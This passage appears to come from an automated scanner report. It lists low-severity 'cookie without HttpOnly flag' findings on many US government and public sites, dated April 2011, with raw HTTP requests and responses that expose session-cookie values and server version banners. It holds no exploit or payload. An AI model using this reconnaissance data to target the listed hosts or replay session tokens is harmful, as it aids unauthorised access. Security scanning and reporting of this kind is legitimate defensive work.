Set-Cookie: AffID=0; domain=mcafee.com; path=/
Set-Cookie: lBounceURL=http%3A%2F%2Fus%2Emcafee%2Ecom%2Froot%2Fbasket%2Easp%3F; domain=mcafee.com; path=/
Set-Cookie: langid=1; domain=mcafee.com; path=/
Set-Cookie: ASPSESSIONIDASDTTCBD=ECGJFJKBNGMILJIOEONEMBLJ; path=/
Cache-control: private
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://home.mcafee.com/secure/cart/">here</a>.</body>

14.106. http://va.gov/ext_redirect.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://va.gov
Path:   /ext_redirect.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ext_redirect.asp HTTP/1.1
Host: va.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s={"v":1,"rid":"1304117532703_517290"}; ASPSESSIONIDCAQBATRA=NIFBGGPAFOPDGHICLJEEJGIH; TSb10539=f437bd08ddec1724d82197548bdbdf6008473dd1ca5220284dbb40e1c2db820ec935e97e; fsr.a=1304117526530; BIGipServerwww.va.gov_pool=1694607552.20480.0000;

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 139
Content-Type: text/html
Location: http://www.va.gov/
Set-Cookie: ASPSESSIONIDCATAASQA=IDBAECMBCFCPGCKLMENIOOLN; path=/
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 12:28:53 GMT
Connection: close
Set-Cookie: TSb10539=3117fe459655ffe1dbf3fe183f1e1427c3f932b3084118724dbc0087; Max-Age=900; Path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.va.gov/">here</a>.</body>

14.107. http://va.gov/ext_redirect.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://va.gov
Path:   /ext_redirect.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ext_redirect.asp?xbox=1 HTTP/1.1
Host: va.gov
Proxy-Connection: keep-alive
Referer: http://va.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.va.gov_pool=1694607552.20480.0000; TSb10539=f437bd08ddec1724d82197548bdbdf6008473dd1ca5220284dbb40e1c2db820ec935e97e; fsr.a=1304117518431

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1537
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCAQBATRA=OIFBGGPAFLJEBEFJBDDOHFBI; path=/
X-Powered-By: ASP.NET
Date: Fri, 29 Apr 2011 22:51:37 GMT
Set-Cookie: TSb10539=f437bd08ddec1724d82197548bdbdf6008473dd1ca5220284dbb40e1c2db820ec935e97e; Max-Age=900; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!-- START: META DATA -->
   <meta http-equiv="Content-Type" content=
...[SNIP]...

14.108. https://web.globalpay.com/taxpayer/default.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://web.globalpay.com
Path:   /taxpayer/default.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /taxpayer/default.asp HTTP/1.1
Host: web.globalpay.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:29:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1095
Content-Type: text/html
Set-Cookie: CISESSIONID=a928f6218ded1a429f519b1e54f13c00ICE89; path=/
Set-Cookie: ASPSESSIONIDQAQCCRDC=DKIDEAACBINHDMEGFHEFNLAD; path=/
Cache-control: private

<HTML><HEAD><TITLE>Unisys Internet Commerce Enabler Error Message</TITLE></HEAD><BODY><table width=100% border=0><tr><td rowspan=2 bordercolor=#0033FF><img src=/CISystem/Images/Globe.gif width=147 hei
...[SNIP]...

14.109. http://webapps6.doc.state.nc.us/opi/offenderescapesearch.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://webapps6.doc.state.nc.us
Path:   /opi/offenderescapesearch.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /opi/offenderescapesearch.do HTTP/1.1
Host: webapps6.doc.state.nc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:10 GMT
Server: Apache/2.0.63 (Win32) mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: JSESSIONID=96BEE71CF7B6C8FD7143F7EDF69FBDCA.CRMIS164_423; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 57016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>
<!-- North Carolina Department of Correction Offender Publi
...[SNIP]...

14.110. http://webapps6.doc.state.nc.us/opi/offenderreleasesearch.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://webapps6.doc.state.nc.us
Path:   /opi/offenderreleasesearch.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /opi/offenderreleasesearch.do HTTP/1.1
Host: webapps6.doc.state.nc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:16 GMT
Server: Apache/2.0.63 (Win32) mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: JSESSIONID=38378D71BF34228CCDD27F2C234C3EA2.CRMIS75_423; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 63053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>
<!-- North Carolina Department of Correction Offender Publi
...[SNIP]...

14.111. http://www.511ia.org/default.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.511ia.org
Path:   /default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.asp HTTP/1.1
Host: www.511ia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:27:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 103464
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQRTBDCD=FNHFKGFBDBEHNOIKFNCIKDFO; path=/
Cache-control: private


<html>
<head>
<title>Iowa DOT Travel Information Service</title>
<meta http-equiv="Refresh" content="300">
<meta http-equiv="Expires" content="4/30/2011 8:27:49 AM">
<meta http-equiv="Content-T
...[SNIP]...

14.112. https://www.accesskansas.org/bess/flow/main  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.accesskansas.org
Path:   /bess/flow/main

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bess/flow/main HTTP/1.1
Host: www.accesskansas.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServerSEC-01=RlI42CO99XZ0pkZi2/r4yXnQdKxpyuX4tX5u6oa50GehoO6ZH/bk9aewHnsaDJGTV5ffMB3VT8faNEQ=; JSESSIONID=98EA5D3BDE2A32469509184A63EF9BC9.aptcs03-inst0; BIGipServerAPTCS03=755898796.38943.0000;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: JSESSIONID=DC10B6BEE0FE752BF70805EA381C26EB.aptcs03-inst0; Path=/bess; Secure
Location: https://www.accesskansas.org/bess/flow/main?execution=e1s1
Content-Length: 0
Date: Sat, 30 Apr 2011 12:29:25 GMT
Connection: close


14.113. https://www.accesskansas.org/businesscenter/index.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.accesskansas.org
Path:   /businesscenter/index.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /businesscenter/index.html HTTP/1.1
Host: www.accesskansas.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServerSEC-01=RlI42CO99XZ0pkZi2/r4yXnQdKxpyuX4tX5u6oa50GehoO6ZH/bk9aewHnsaDJGTV5ffMB3VT8faNEQ=; JSESSIONID=98EA5D3BDE2A32469509184A63EF9BC9.aptcs03-inst0; BIGipServerAPTCS03=755898796.38943.0000;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6002DAF7EA0788EC7E76909CE718C6DB.aptc08-inst1; Path=/businesscenter
Content-Type: text/html
Content-Length: 7678
Date: Sat, 30 Apr 2011 12:29:28 GMT
Connection: close
Set-Cookie: BIGipServerAPTC-08=50GZb+EeVt2EsWBi2/r4yXnQdKxpyl9D5SpxrI79Y5IzkVl4IWp2Ps4JBy5C7p/6Xgu9rxKETzSItw==; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

14.114. https://www.accesskansas.org/dissolutions/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.accesskansas.org
Path:   /dissolutions/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dissolutions/ HTTP/1.1
Host: www.accesskansas.org
Connection: keep-alive
Referer: http://www.kansas.gov/services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=98EA5D3BDE2A32469509184A63EF9BC9.aptcs03-inst0; Path=/dissolutions; Secure
Location: https://www.accesskansas.org/dissolutions/index.do
Content-Type: text/html
Content-Length: 0
Date: Sat, 30 Apr 2011 11:22:44 GMT
Set-Cookie: BIGipServerAPTCS03=755898796.38943.0000; path=/


14.115. http://www.adfg.alaska.gov/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.adfg.alaska.gov
Path:   /index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.cfm?adfg=home.main HTTP/1.1
Host: www.adfg.alaska.gov
Proxy-Connection: keep-alive
Referer: http://alaska.gov/quote.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:17:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: CFID=2291328; Expires=Mon, 22-Apr-2041 22:17:44 GMT; Path=/
Set-Cookie: CFTOKEN=80327216; Expires=Mon, 22-Apr-2041 22:17:44 GMT; Path=/
Set-Cookie: JSESSIONID=9949254E8F91CB0A31579F9385A8CFE2; Path=/; HttpOnly
Via: 1.1 www.adfg.alaska.gov
Content-Length: 54078

<!DOCTYPE html>
   
   
                                                           <html lang="en-us">
   <head>
<title>Home Page, Alaska Department of Fish and Game</title>
<meta http-equiv="Content-Type" con
...[SNIP]...

14.116. http://www.agriculture.state.tn.us/Marketing.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.agriculture.state.tn.us
Path:   /Marketing.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Marketing.asp HTTP/1.1
Host: www.agriculture.state.tn.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 8180
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSBDQRCB=HDNJABEBOEKCBCECEPFDIHMK; path=/
Date: Sat, 30 Apr 2011 12:29:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...

14.117. http://www.alabama.gov/portal/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.alabama.gov
Path:   /portal/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/index.jsp HTTP/1.1
Host: www.alabama.gov
Proxy-Connection: keep-alive
Referer: http://al.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:36:24 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Cache-Control: private
Set-Cookie: JSESSIONID=abcI5QvmCkxSLfmPB1J_s; path=/
Content-Type: text/html
Content-Length: 34756


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...

14.118. https://www.alabamainteractive.org/abc_license/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.alabamainteractive.org
Path:   /abc_license/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /abc_license/ HTTP/1.1
Host: www.alabamainteractive.org
Connection: keep-alive
Referer: http://www.alabama.gov/portal/secondary.jsp?id=professional
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:24:51 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Cache-Control: private
Set-Cookie: JSESSIONID=abcWSekZskj886PHHaK_s; path=/
Keep-Alive: timeout=20, max=150
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 3284


<link rel='stylesheet' href='content/common/styleSheet.jsp' type='text/css'/>

<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" class="containerTable">
...[SNIP]...

14.119. http://www.budget.state.pa.us/portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.budget.state.pa.us
Path:   /portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566 HTTP/1.1
Host: www.budget.state.pa.us
Proxy-Connection: keep-alive
Referer: http://pa.gov/portal/server.pt/community/pa_gov/2966
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:37:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Language: en
Set-Cookie: ASP.NET_SessionId=o0wp4k55g2s4a4miw52ccf55; path=/
Expires: 1304037449218
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304123849218
Content-Type: text/html; charset=utf-8
Content-Length: 52356

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>Current and Proposed Commonw
...[SNIP]...

14.120. http://www.buzgate.org/8.0/ny/fh.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.buzgate.org
Path:   /8.0/ny/fh.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8.0/ny/fh.html HTTP/1.1
Host: www.buzgate.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:53 GMT
Server: Apache/2.2.17
Set-Cookie: BUZGateSessionInfo=69bc2eaab818394ecad836891008931a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: state=NY; expires=Sat, 30-Apr-2011 12:59:53 GMT; path=/
Set-Cookie: state_name=New+York; expires=Sat, 30-Apr-2011 12:59:53 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 27047


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

14.121. http://www.capehenlopenschools.com/education/district/district.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.capehenlopenschools.com
Path:   /education/district/district.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /education/district/district.php HTTP/1.1
Host: www.capehenlopenschools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:53 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=b4748176e51e34663911c7b3aa2ed59b; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 47840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...

14.122. http://www.carson-city.nv.us/Index.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.carson-city.nv.us
Path:   /Index.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Index.aspx HTTP/1.1
Host: www.carson-city.nv.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 149
Content-Type: text/html; charset=utf-8
Location: http://www.carson.org/Index.aspx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=yixj4455bbgplo45jete5t45; path=/
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 12:29:57 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='http://www.carson.org/Index.aspx'>here</a>.</h2>
</body></html>

14.123. http://www.colorado.gov/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.colorado.gov
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:21 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-store
Last-Modified: Sat, 30 Apr 2011 11:13:22 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=710475B8CD396D3A3B6A4C1A37523B52; Path=/cs
Set-Cookie: SS_X_JSESSIONID=29A408E2CEEA0BF8523CBC7D147C658F; Path=/
Set-Cookie: BIGipServer=297861130.36895.0000; Path=/
Set-Cookie: BIGipServer=180355082.20480.0000; path=/
Set-Cookie: BIGipServer=348127242.20480.0000; path=/
Content-Length: 58570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
    <hea
...[SNIP]...

14.124. http://www.colorado.gov/cs/Satellite  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.colorado.gov
Path:   /cs/Satellite

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cs/Satellite?blobcol=urldata&blobkey=id&blobtable=MungoBlobs&blobwhere=1251607525840&ssbinary=true HTTP/1.1
Host: www.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3920A9A4131871B53676E0AC96532A74; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; BIGipServer=348127242.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:13:34 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sat, 30 Apr 2011 11:13:34 GMT
Content-Type: image/gif
Set-Cookie: JSESSIONID=D5AE58D8BD035AECA1B64AA51BBA5FBB; Path=/cs
Set-Cookie: SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; Path=/
Set-Cookie: BIGipServer=297861130.36895.0000; Path=/
Content-Length: 9136

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

14.125. http://www.coloradochannel.net/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.coloradochannel.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.coloradochannel.net
Proxy-Connection: keep-alive
Referer: http://www.leg.state.co.us/clics/clics2011a/cslFrontPages.nsf/Audio?OpenForm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:32:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: SESS8c46cefb3d49ee625c6d0242934806ee=2th1ba10a82aj73fmomts36gh3; expires=Mon, 23-May-2011 15:05:56 GMT; path=/; domain=.coloradochannel.net
Last-Modified: Sat, 30 Apr 2011 10:49:32 GMT
ETag: "9aa10e653d6caa1a196ba2f1487f25d6"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 18573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...

14.126. http://www.conwaygreene.com/nmonesource/publicLicense.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.conwaygreene.com
Path:   /nmonesource/publicLicense.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nmonesource/publicLicense.aspx HTTP/1.1
Host: www.conwaygreene.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sat, 30 Apr 2011 12:39:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: http://www.conwaygreene.com/nmsu/lpext.dll?f=templates&fn=main-h.htm&2.0
Set-Cookie: ASP.NET_SessionId=z3rqq5zh5kvdj0bpdofa3rzz; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 197

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='http://www.conwaygreene.com/nmsu/lpext.dll?f=templates&amp;fn=main-h.htm&amp;2.0'>here</a>.</h2>
</body></html>

14.127. http://www.cotrip.org/device.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cotrip.org
Path:   /device.htm

Issue detail

